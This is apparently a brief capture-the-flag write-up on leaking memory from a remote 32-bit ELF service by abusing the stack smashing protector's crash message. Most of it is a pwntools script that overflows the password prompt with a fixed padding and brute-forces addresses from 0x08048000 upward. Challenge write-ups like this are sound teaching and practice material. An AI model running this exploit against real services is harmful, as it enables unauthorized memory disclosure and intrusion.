
ELF32 information leakage with Stack Smashing protector

There was no binary file given .. it was running in a port asking for password
By default ELF binaries are mapped at 0x08048000
So, I tried to bruteforce the layout 0x08048fff-0x08048000

from pwn import * for i in xrange(0x08048ffe, 0x08048000, -0x2): c = remote("",56529) c.recvuntil("service: ") c.send('A'*256 + 'B'*168 + p32(i)) try: c.recvuntil("*** stack smashing detected ***:") print "[" + hex(i) + "]" + c.recvuntil("terminated")[:-10] except: #print "[-] crash" None print "end ..."

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